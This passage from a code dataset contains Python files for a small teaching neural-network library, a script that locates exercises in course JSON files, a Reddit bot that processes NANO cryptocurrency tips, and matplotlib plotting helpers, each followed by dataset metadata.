--->< ---- 20 char --->\n# \n# MiniNN is a simple neural network library crafted by Forrest Sheng Bao \n# at Iowa State University for students to hack to understand NNs. \n# MiniNN is deveoped because the source code of scikit-learn.neural_network \n# or Flux was too long to study and not easy to hack. Not to mention the\n# complexity of source code of Tensorflow or PyTorch for teaching intro to ML.\n# With MiniNN, students can easily see gradients on all weights between \n# layers during training and visualize every layer, and tweak around.\n\n# Under 200 lines, it covers all core operations of NNs: \n# feedforward, backpropagation, and gradient descent. \n# To be mini and simple, it supports only logistic/sigmoid activation,\n# cross entropy loss, and updating the NN with one sample each time. \n# Preinitialized transfer/weight matrixes are needed to intialize the network. \n\n# Feel free to use it in your teaching or playing. 
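\n#\n# A minimal usage sketch (the layer sizes, iteration count and variable\n# names here are placeholders; see the __main__ block at the bottom for a\n# complete, runnable example):\n#     nn = MiniNN(hidden_layer=[8], batch_size=4)  # one hidden layer of 8 neurons\n#     nn.train(x_augmented, y_onehot, max_iter=10) # rows of x start with the bias 1\n#     nn.test(x_augmented, y_onehot)               # prints the fraction classified correctly\n#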
\n# Licensed under BSD 3-clause \n# Copyright 2020 Forrest Sheng Bao\n# Contact him for any suggestions or questions: forrest dot bao aT Gmail \n# Opinions expressed here do not reflect those of Iowa State University\n\nimport numpy \nimport numpy.random\nfrom sklearn.utils import gen_batches\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nnumpy.set_printoptions(precision=3, floatmode=\"fixed\")\n\nclass MiniNN: \n    \"\"\"\n\n    Naming convention: Any self variable starting with a capitalized letter and ending with s is a list of 1-D or 2-D numpy arrays, each element of which is about one layer, such as weights from one layer to its next layer. \n\n    self.Ws: list of 2-D numpy arrays, transfer matrices of all layers, ordered in feedforward sequence \n    self.phi: activation function \n    self.psi: derivative of activation function, in terms of its OUTPUT, ONLY when phi is logistic \n    self.Xs: list of 1-D numpy arrays, output from each layer\n    self.Deltas: list of 1-D numpy arrays, delta from each layer\n\n    \"\"\"\n    def logistic(self, x):\n        return 1/(1 + numpy.exp(-x)) \n\n    def logistic_psi(self, x):\n        \"\"\"If the output of a logistic function is x, then the derivative of x over \n        the input is x * (1-x)\n        \"\"\"\n        return x * (1-x)\n\n    def __init__(self, hidden_layer=[5], L2=False, lambd=0.01, batch_size=1, seed=1):\n        \"\"\"Initialize an NN\n\n        hidden_layer: does not include bias\n        \"\"\"\n        self.hidden_layer = list(hidden_layer) # copy, so train() mutates neither the caller's list nor the shared default\n        self.L = len(hidden_layer) + 1 # number of transfer matrices\n        self.phi = self.logistic # same activation function for all neurons\n        self.psi = self.logistic_psi\n        self.L2 = L2 # L2 regularization\n        self.lambd = lambd # hyperparameter of L2 regularization\n        self.batch = batch_size # size of batch\n        self.seed = seed # seed of random matrix\n\n    def feedforward(self, x, W, phi):\n        \"\"\"feedforward from previous layer output x to next layer via W and phi\n        return an augmented output where the first element is 1, the bias \n\n        Note the augmented 1 is redundant when the forwarded layer is output.
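\n        For example (shapes picked arbitrarily, purely for illustration):\n        with x of length 4 (a bias 1 plus 3 features) and W of shape (4, 5),\n        the return value has length 6: a leading 1 followed by the 5 values\n        of phi(W.T @ x).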
\n\n        x: 1-D numpy array, augmented input\n        W: 2-D numpy array, transfer matrix\n        phi: a function name, activation function\n        \"\"\"\n\n        return numpy.concatenate(([1], # augment the bias 1\n                phi(\n                    numpy.matmul( W.transpose(), x ) \n                   ) # end of phi\n               )) # end of concatenate\n\n    def predict(self, X_0):\n        \"\"\"make prediction, and log the output of all neurons for backpropagation later \n\n        X_0: 1-D numpy array, the input vector, AUGMENTED\n        \"\"\"\n        Xs = [X_0]; X = X_0\n        for W in self.Ws:\n            X = self.feedforward(X, W, self.phi)\n            Xs.append(X)\n        self.Xs = Xs\n        self.oracle = X[1:] # it is safe because Python preserves variables used in for-loops\n\n    def backpropagate(self, delta_next, W_now, psi, x_now):\n        \"\"\"make one step of backpropagation \n\n        delta_next: delta at the next layer, INCLUDING that on bias term \n                    (next means layer index increase by 1; \n                    backpropagation is from next layer to current/now layer)\n        W_now: transfer matrix from current layer to next layer (e.g., from layer l to layer l+1)\n        psi: derivative of activation function in terms of the activation, not the input of activation function\n        x_now: output of current layer \n        \"\"\"\n        delta_next = delta_next[1:] # drop the derivative of error on bias term \n\n        # first propagate error to the output of previous layer\n        delta_now = numpy.matmul(W_now, delta_next) # transfer backward\n        # then propagate thru the activation function at previous layer \n        delta_now *= psi(x_now) \n        # Hadamard product. This ONLY works when the activation function is logistic\n        return delta_now\n\n    def get_deltas(self, target):\n        \"\"\"Produce deltas at every layer \n\n        target: 1-D numpy array, the target of a sample \n        delta : 1-D numpy array, delta at current layer\n        \"\"\"\n        delta = self.oracle - target # delta at output layer is prediction minus target \n        # only when activation function is logistic \n        delta = numpy.concatenate(([0], delta)) # artificially prepend the delta on bias to match that in non-output layers. \n        self.Deltas = [delta] # log delta's at all layers\n\n        for l in range(len(self.Ws)-1, -1, -1): # propagate error backwardly \n            # technically, no need to loop to l=0 the input layer. But we do it anyway\n            # l is the layer index \n            W, X = self.Ws[l], self.Xs[l]\n            delta = self.backpropagate(delta, W, self.psi, X)\n            self.Deltas.insert(0, delta) # prepend, because BACK-propagate\n\n    def get_gradient(self):\n        \"\"\"Given a sequence of Deltas and a sequence of Xs, compute the gradient of error on each transfer matrix\n\n        Note that the first element on each delta is on the bias term. It should not be involved in computing the gradient on any weight because the bias term is not connected with the previous layer.\n        \"\"\"\n\n        # get the gradient of each sample in batch then accumulate the gradient\n        for l in range(self.L): # l is layer index\n            x = self.Xs[l]\n            delta = self.Deltas[l + 1]\n            # print (l, x, delta)\n            gradient = numpy.outer(x, delta[1:])\n            self.gradient[l] += gradient / self.batch\n\n    # check the correct rate of the NN\n\n    def test(self, x, y):\n        score = 0\n        # print(\"test:\")\n        for i in range(len(x)):\n            self.predict(x[i])\n            predict = self.oracle\n            # print(predict, y[i])\n            index = numpy.argmax(predict)\n            if y[i][index] == 1:\n                score += 1\n        print(score / len(x))\n\n    def train(self, x, y, max_iter=100):\n        \"\"\"feedforward, backpropagation, and update weights\n        Unlike the one-sample version described above, x and y here can hold a bunch of samples, which are consumed one mini-batch at a time.
\n\n        x: 1-D numpy array (a single augmented input vector), or 2-D numpy array with one sample per row, the first column being the bias 1\n        y: 1-D numpy array (a single target), or 2-D numpy array of one-hot targets, one row per sample\n\n        \"\"\"\n\n        # determine the input layer size and output layer size according to x and y\n        if len(x.shape) == 1:\n            lenx = len(x) - 1\n            leny = len(y)\n            sample_count = 1\n        else:\n            lenx = x.shape[1] - 1\n            leny = y.shape[1]\n            sample_count = len(x)\n\n        self.sample_count = sample_count\n        self.hidden_layer.append(leny)\n        self.hidden_layer.insert(0, lenx) # insert input layer and output layer\n\n        # initialize transfer matrices with uniform random values in [-1, 1)\n        Ws = []\n        numpy.random.seed(self.seed)\n        for i in range(self.L):\n            Wi = numpy.random.random((self.hidden_layer[i] + 1, self.hidden_layer[i + 1]))\n            Ws.append(2 * Wi - 1)\n        self.Ws = Ws\n        # print(Ws)\n\n        for epoch in range(max_iter):\n            # print (\"epoch\", epoch, end=\":\")\n            for slice in gen_batches(sample_count, self.batch):\n                # print(slice)\n                x_batch = x[slice] # slice the samples and labels to the same size\n                y_batch = y[slice]\n                self.gradient = [0] * self.L\n                for k, xx in enumerate(x_batch):\n                    self.predict(xx) # forward\n                    # print(self.oracle, y_batch[k])\n                    self.get_deltas(y_batch[k]) # backpropagate\n                self.get_gradient() # get batch gradient\n                for l in range(self.L):\n                    p = 1 # learning rate\n                    if self.L2: # L2 regularization\n                        self.Ws[l] = (1 - p * self.lambd) * self.Ws[l] - p * self.gradient[l]\n                    else:\n                        self.Ws[l] -= p * self.gradient[l] # batch gradient descent\n\nif __name__ == \"__main__\":\n\n    # this part uses make_classification to create samples for the test: 1000 samples, 2 classes\n    n = 2\n    x, y = make_classification(n_samples=1000, n_features=2, n_informative=n, n_classes=n, n_redundant=0)\n    bias = numpy.ones((len(x), 1))\n    x_0 = numpy.hstack((bias, x))\n    y_0 = numpy.zeros((len(y), n))\n    for i in range(len(y)):\n        y_0[i][y[i]] = 1\n\n    # split samples into train and test\n    x_train, x_test, y_train, y_test = train_test_split(x_0, y_0, test_size=0.2, random_state=1)\n\n    hidden = [8]\n    MNN = MiniNN(hidden_layer=hidden, L2=False, lambd=0.01, batch_size=1, seed=1) # initialize an NN\n\n    MNN.train(x_train, y_train, max_iter=10)\n    print(\"train:\")\n    MNN.test(x_train, y_train)\n    print(\"test:\")\n    MNN.test(x_test, y_test)\n\n    # plot the samples\n    c1 = x[y == 0]\n    c2 = x[y == 1]\n    plt.plot(c1[:, 0], c1[:, 1], '.b')\n    plt.plot(c2[:, 0], c2[:, 1], '.r')\n    plt.show()\n", "sub_path": "projects/MiniNN.py", "file_name": "MiniNN.py", "file_ext": "py", "file_size_in_byte": 9593, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.set_printoptions", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": 
"attribute"}, {"api_name": "sklearn.utils.gen_batches", "line_number": 198, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 222, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}]} +{"seq_id": "593843139", "text": "'''\r\n@author: Quyen Doan, https://github.com/qdoan1651/DevMathPython\r\n@file: mtmf/course_workspace_update/extract_exercises_location_v1.py\r\n@desc: Extract location for a list of exercise items in the course \r\n for verification of course workspace update. \r\n'''\r\nimport logging, os\r\nfrom myutils import utils_files_io\r\n\r\ndef process_json_into_hash_table(filename):\r\n course_items = {}\r\n \r\n jo = utils_files_io.read_json_from_file(filename)\r\n \r\n print('Processing JSON into hash table for searching...')\r\n logging.info(' *********************************************')\r\n logging.info(' * Processing JSON into hash table...')\r\n logging.info(' *********************************************')\r\n for item in jo:\r\n is_hidden = item['suppressed']\r\n category_type = item['categoryType']\r\n if category_type == 'assignment':\r\n assignment_number = item['ordinal']\r\n assignment_name = item['title']\r\n logging.info(' Processing assignment {}. {}'.format(assignment_number, assignment_name))\r\n \r\n lo_number = 1\r\n for learning_outcome in item['learningOutcomes']:\r\n module_name = learning_outcome['title']\r\n for learning_objective in learning_outcome['learningObjectives']:\r\n lo_name = learning_objective['label']\r\n logging.info(' Processing LO {}. 
{} ({})'.format(lo_number, lo_name, module_name))\r\n \r\n for question_number, cgid in enumerate(learning_objective['standardExerciseItemCgis']):\r\n logging.info(' Processing CGID {}...'.format(cgid))\r\n course_items[cgid] = '{}; {}; {}; {} ({}); {}; {}'.format(assignment_number, assignment_name, \r\n lo_number, lo_name, module_name,\r\n question_number + 1, is_hidden)\r\n lo_number = lo_number + 1\r\n utils_files_io.write_json_to_file(course_items, 'C:/Workspace/Sandbox/temp.json')\r\n return course_items\r\n\r\ndef locate_single_item_in_courses(item, courses_list):\r\n result = {'active': [], 'hidden': [], 'not_found': [], 'count': {}}\r\n \r\n dirname = 'C:/Workspace/DevMath/Course Workspace Update/2018 Fall Courses/JSON'\r\n for course in courses_list:\r\n print('Processing course {}...'.format(course))\r\n filename = os.path.join(dirname, course + '.json')\r\n course_items = process_json_into_hash_table(filename)\r\n if item in course_items.keys():\r\n info = course_items[item]\r\n if info.split('; ')[-1] == 'False':\r\n result['active'].append(course + '; ' + info)\r\n else:\r\n result['hidden'].append(course + '; ' + info)\r\n else:\r\n result['not_found'].append(course)\r\n \r\n result['count']['active'] = len(result['active'])\r\n result['count']['hidden'] = len(result['hidden'])\r\n result['count']['not_found'] = len(result['not_found'])\r\n\r\n outfile = 'C:/Workspace/Sandbox/out(LJAATHP866MLZB5B9643).json'\r\n msg = 'Writing result to file {}...'.format(outfile)\r\n print(msg); logging.info(' ' + msg)\r\n utils_files_io.write_json_to_file(result, outfile)\r\n\r\ndef locate_items_in_courses(items_list, courses_list, outfile):\r\n result = {}\r\n \r\n dirname = 'C:/Workspace/DevMath/Course Workspace Update/2019 Spring Courses/JSON'\r\n for course in courses_list:\r\n print('Processing course {}...'.format(course))\r\n if course not in result.keys():\r\n result[course] = {}\r\n else:\r\n print('*** Warning: Course {} appears previously.'.format(course))\r\n filename = os.path.join(dirname, course + '.json')\r\n course_items = process_json_into_hash_table(filename)\r\n for item in items_list:\r\n if item in course_items.keys():\r\n info = course_items[item]\r\n if info.split('; ')[-1] == 'False':\r\n result[course][item] = info\r\n else:\r\n result[course][item] = '[Hidden] ' + info\r\n else:\r\n result[course][item] = '[Not Found] '\r\n \r\n msg = 'Writing result to file {}...'.format(outfile)\r\n print(msg); logging.info(' ' + msg)\r\n utils_files_io.write_json_to_file(result, outfile)\r\n \r\nif __name__ == '__main__':\r\n log_file = 'C:/Workspace/Sandbox/log.txt';\r\n if os.path.isfile(log_file): os.remove(log_file)\r\n logging.basicConfig(filename = log_file, level=logging.INFO)\r\n \r\n ''' Get list of courses '''\r\n courses_list = utils_files_io.read_list_from_file('courses_list_batch4.txt')\r\n \r\n ''' Get items list '''\r\n items_list = utils_files_io.read_list_from_file('items_list_cd22.txt')\r\n \r\n ''' Locate items in courses '''\r\n locate_items_in_courses(items_list, courses_list, 'items_location_batch4.json')\r\n\r\n# start = time.time()\r\n# elapsed = time.time() - start\r\n# print('Elapsed: %10.3f' %elapsed)\r\n \r\n \r\n", "sub_path": "DevMathPython/course_workspace_update/xothers/spring2019_batch4_prep/locate_items.py", "file_name": "locate_items.py", "file_ext": "py", "file_size_in_byte": 5154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": 
"myutils.utils_files_io.read_json_from_file", "line_number": 13, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 13, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 35, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 40, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 66, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 67, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 92, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 93, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 93, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 98, "usage_type": "attribute"}, {"api_name": "myutils.utils_files_io.read_list_from_file", "line_number": 101, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 101, "usage_type": "name"}, {"api_name": "myutils.utils_files_io.read_list_from_file", "line_number": 104, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "491952498", "text": "import math\nimport sys\nimport traceback\n\nimport praw.exceptions\n\nimport util\n\n\nclass Tipper:\n def __init__(self, db, reddit_client, wallet_id, rest_wallet, log):\n self.wallet_id = wallet_id\n self.db = db\n self.reddit_client = reddit_client\n self.rest_wallet = rest_wallet\n self.log = log\n\n @util.handle_api_exceptions(max_attempts=3)\n def comment_reply(self, comment, reply_text):\n self.log.info(\"BOT MAKING COMMENT REPLY:\")\n self.log.info(reply_text)\n comment.reply(reply_text)\n\n @staticmethod\n def is_usd(amount):\n if amount.startswith(\"$\"):\n return True\n return False\n\n def send_tip(self, comment, amount, sender_user_address, receiving_address, receiving_user, prior_reply_text):\n try:\n rate = util.get_price()\n if rate is None:\n raise ValueError('Could not retrieve rate')\n\n formatted_rate = str(format(float(rate), '.3f'))\n formatted_amount = amount\n if self.is_usd(amount):\n amount = amount[1:]\n usd = amount\n formatted_usd = usd\n amount = float(amount) / rate\n formatted_amount = str(format(float(amount), '.6f'))\n else:\n usd = float(amount) * rate\n formatted_usd = str(format(float(usd), '.3f'))\n\n self.log.info(\"Sending amount: \" + str(amount) + \"NANO, $\" 
+ str(usd))\n data = {'action': 'account_balance',\n 'account': sender_user_address}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n data = {'action': 'rai_from_raw', 'amount': int(\n post_body['balance'])}\n rai_balance = self.rest_wallet.post_to_wallet(data, self.log)\n\n # float of total send\n float_amount = float(amount)\n if float_amount > 0:\n rai_send = float_amount * 1000000\n raw_send = str(int(rai_send)) + '000000000000000000000000'\n self.log.info(\"Current rai balance: \" + str(rai_balance['amount']))\n\n # Add prior reply text to new\n reply_text = \"\"\n\n if prior_reply_text is not None:\n reply_text = prior_reply_text + \"\\n\\n\"\n\n # check amount left\n if int(rai_send) <= int(rai_balance['amount']):\n self.log.info('Tipping now')\n data = {'action': 'send', 'wallet': self.wallet_id, 'source': sender_user_address,\n 'destination': receiving_address, 'amount': int(raw_send)}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n reply_text = reply_text + \\\n 'Tipped %s NANO or $%s to /u/%s\\n\\nUSD conversion rate of $%s per NANO from [Coin Market Cap](https://coinmarketcap.com/currencies/nano/)\\n\\n[Block Link](https://www.nanode.co/block/%s)' \\\n % (formatted_amount, formatted_usd, receiving_user, formatted_rate,\n str(post_body['block']))\n reply_text = reply_text + \" \\n\\nGo to the [wiki]\" + \\\n \"(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more info\"\n else:\n reply_text = reply_text + 'Not enough in your account to tip'\n\n self.comment_reply(comment, reply_text)\n except TypeError as e:\n reply_message = 'An error came up, your request could not be processed\\n\\n' + \\\n ' Paging /u/valentulus_menskr error id: ' + comment.fullname + '\\n\\n'\n self.comment_reply(comment, reply_message)\n tb = traceback.format_exc()\n self.log.error(e)\n self.log.error(tb)\n except:\n reply_message = 'An error came up, your request could not be processed\\n\\n' + \\\n ' Paging /u/valentulus_menskr error id: ' + comment.fullname + '\\n\\n'\n self.comment_reply(comment, reply_message)\n self.log.error(\"Unexpected error in send_tip: \" + str(sys.exc_info()[0]))\n tb = traceback.format_exc()\n self.log.error(tb)\n\n def process_tip(self, amount, comment, receiving_user):\n if receiving_user.lower() == 'giftnano':\n receiving_user = 'giftxrb'\n user_table = self.db['user']\n comment_table = self.db['comments']\n\n # See if we have an author xrb address and a to xrb address, if not invite to register\n self.log.info(\"Looking for sender \" + \"'\" + comment.author.name + \"'\" + \" in db\")\n\n sender_user_data = util.find_user(comment.author.name, self.log, self.db)\n\n if sender_user_data is not None:\n self.log.info('Sender in db')\n # Author registered\n sender_user_address = sender_user_data['xrb_address']\n\n reply_text = None\n\n user_data = util.find_user(receiving_user, self.log, self.db)\n if user_data is not None:\n receiving_address = user_data['xrb_address']\n else:\n self.log.info(\"Receiving User \" + \"'\" + receiving_user + \"'\" + \" Not in DB - registering\")\n # Generate address\n data = {'action': 'account_create',\n 'wallet': self.wallet_id}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n self.log.info(\"Receiving User new account: \" + str(post_body['account']))\n\n # Add to database\n record = dict(user_id=receiving_user, xrb_address=post_body['account'])\n self.log.info(\"Inserting into db: \" + str(record))\n user_table.insert(record)\n receiving_address = post_body['account']\n\n reply_text = 
str(receiving_user) \\\n + ' isn\\'t registered, so I made an account for them. ' \\\n + 'They can access it by messaging the bot.'\n\n self.send_tip(comment, amount, sender_user_address, receiving_address, receiving_user, reply_text)\n\n else:\n self.log.info('Sender NOT in db')\n reply_text = 'Hi /u/' + str(comment.author.name) + ', please register with the bot by sending it a' \\\n + ' private message with the text \"register\" in the body of the message. \\n\\nGo to the [wiki]' + \\\n \"(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more info\"\n\n self.comment_reply(comment, reply_text)\n\n # Add to db\n record = dict(\n comment_id=comment.fullname, to=receiving_user, amount=amount, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n @staticmethod\n def isfloat(value):\n try:\n if len(value) > 0 and value.startswith(\"$\"):\n value = value[1:]\n\n float_val = float(value)\n if not math.isnan(float_val):\n return True\n except ValueError:\n return False\n return False\n\n @staticmethod\n def parse_user(user):\n if user.startswith('/u/'):\n user = user[3:]\n return user\n\n def user_exists(self, user):\n exists = True\n try:\n self.reddit_client.redditor(user).fullname\n except praw.exceptions.PRAWException:\n self.log.error(\"User '\" + user + \"' not found\")\n exists = False\n except:\n self.log.error(\"Unexpected error in send_tip: \" + str(sys.exc_info()[0]))\n tb = traceback.format_exc()\n self.log.error(tb)\n exists = False\n return exists\n\n def invalid_formatting(self, comment, mention):\n comment_table = self.db['comments']\n self.log.info('Invalid formatting')\n if comment.author.name.lower() != 'raiblocks_tipbot' and comment.author.name.lower() != 'nano_tipbot' and comment.author.name.lower() != 'nano4u':\n if mention:\n self.comment_reply(comment, 'Was I mentioned? I could not parse your request \\n\\nGo to the [wiki]' +\n '(https://np.reddit.com/r/NANO_tipbot/wiki/start) to learn how to tip with' +\n ' NANO')\n else:\n self.comment_reply(comment,\n 'Tip command is invalid. 
Tip with any of the following formats: \\n\\n' +\n '`!tipNANO ` \\n\\n`/u/NANO_TipBot ` \\n\\n'\n + '`/u/NANO4U ` \\n\\nGo to the [wiki]' +\n '(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more commands')\n record = dict(\n comment_id=comment.fullname, to=None, amount=None, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n def process_command(self, comment, receiving_user, amount):\n # parse reddit username\n receiving_user = self.parse_user(receiving_user)\n self.log.info(\"Receiving user: \" + receiving_user)\n self.process_tip(amount, comment, receiving_user)\n\n def validate_double_parameter_tip(self, parts_of_comment, command_index):\n receiving_user = parts_of_comment[command_index + 1]\n amount = parts_of_comment[command_index + 2]\n passing = False\n if self.isfloat(amount):\n # valid amount input\n # parse reddit username\n receiving_user = self.parse_user(receiving_user)\n # check if that is a valid reddit\n if self.user_exists(receiving_user):\n passing = True\n\n return passing\n\n def validate_single_parameter_tip(self, parts_of_comment, command_index):\n # check that index+1 is a float before proceeding to extract receiving_user\n amount = parts_of_comment[command_index + 1]\n if self.isfloat(amount):\n return True\n return False\n\n def process_single_parameter_tip(self, comment, amount):\n # Is this a root comment?\n is_root = comment.is_root\n self.log.info(\"Root comment? \" + str(comment.is_root))\n if is_root:\n receiving_user = comment.link_author\n else:\n # Get parent\n parent = comment.parent()\n receiving_user = parent.author.name\n self.log.info(\"Parent: \")\n self.log.info(vars(parent))\n\n self.process_command(comment, receiving_user, amount)\n\n def parse_tip(self, comment, parts_of_comment, command_index, mention):\n # get a reference to the table 'comments'\n comment_table = self.db['comments']\n\n # Save the comment id in a database so we don't repeat this\n if comment_table.find_one(comment_id=comment.fullname):\n self.log.info('Already in db, ignore')\n else:\n author = comment.author.name.lower()\n try:\n subreddit_name = comment.subreddit.display_name;\n except:\n subreddit_name = ''\n\n if author != \"reddit\" and author != \"xrb4u\" and author != \"raiblocks_tipbot\" and author != \"giftxrb\" \\\n and author != \"automoderator\" and author != \"giftnano\" and author != \"nano_tipbot\" and author != \"nano4u\" and subreddit_name.lower() != \"cryptocurrency\":\n length = len(parts_of_comment)\n passing = False\n\n # check that index+2 exists in array\n if command_index + 2 < length:\n # check for both tip formats\n # !tipxrb \n # !tipxrb \n receiving_user = parts_of_comment[command_index + 1]\n amount = parts_of_comment[command_index + 2]\n if self.validate_double_parameter_tip(parts_of_comment, command_index):\n self.process_command(comment, receiving_user, amount)\n passing = True\n elif self.validate_single_parameter_tip(parts_of_comment, command_index):\n amount = parts_of_comment[command_index + 1]\n self.process_single_parameter_tip(comment, amount)\n passing = True\n\n elif command_index + 1 < length:\n # check for one tip format\n # !tipxrb \n if self.validate_single_parameter_tip(parts_of_comment, command_index):\n amount = parts_of_comment[command_index + 1]\n self.process_single_parameter_tip(comment, amount)\n passing = True\n\n if not passing:\n # invalid command\n self.invalid_formatting(comment, mention)\n else:\n # Add to db\n record 
= dict(\n comment_id=comment.fullname, to=None, amount=None, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n def parse_comment(self, comment, commands, mention):\n comment_split_newlines = comment.body.lower().splitlines()\n found = False\n for line in comment_split_newlines:\n parts_of_comment = line.split(\" \")\n for command in commands:\n command = command.lower()\n if command in parts_of_comment and not found:\n found = True\n self.log.info('\\n\\n')\n self.log.info('Found tip reference in comments')\n self.log.info(\"Comment is as follows:\")\n self.log.info((vars(comment)))\n\n command_index = parts_of_comment.index(command)\n self.parse_tip(comment, parts_of_comment, command_index, mention)\n", "sub_path": "tipper.py", "file_name": "tipper.py", "file_ext": "py", "file_size_in_byte": 14299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "util.handle_api_exceptions", "line_number": 18, "usage_type": "call"}, {"api_name": "util.get_price", "line_number": 32, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 96, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 97, "usage_type": "call"}, {"api_name": "util.find_user", "line_number": 109, "usage_type": "call"}, {"api_name": "util.find_user", "line_number": 118, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 163, "usage_type": "call"}, {"api_name": "praw.exceptions.exceptions", "line_number": 179, "usage_type": "attribute"}, {"api_name": "praw.exceptions", "line_number": 179, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 183, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "19102055", "text": "import matplotlib.pyplot as plt\n\n# sort the data and make a graph\ndef show_graph(graph, title, xlabel, ylabel):\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(*zip(*sorted(graph.items())))\n \n \ndef show_two_graphs(graph1, graph2, title, xlabel, ylabel):\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(*zip(*sorted(graph1.items())), label='one_level')\n plt.plot(*zip(*sorted(graph2.items())), label='two_level')\n plt.legend(loc=2)\n \n\n", "sub_path": "Ipython/Training/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.title", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 13, "usage_type": 
